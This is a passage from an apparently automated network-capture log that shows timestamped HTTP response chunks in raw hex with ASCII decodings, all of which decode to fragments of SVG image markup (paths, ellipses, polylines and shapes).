                                                                                                                                                                                                                                                  Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4165INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4181INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                  Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4197INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                  Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4213INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                  Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4229INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                  Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4245INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                  Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4261INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                  Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4277INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                  Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4293INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                  Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4309INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                  Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4325INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                  Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4341INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                  Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4357INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4373INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                  Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4389INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                  Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4405INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                  Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4421INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4437INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 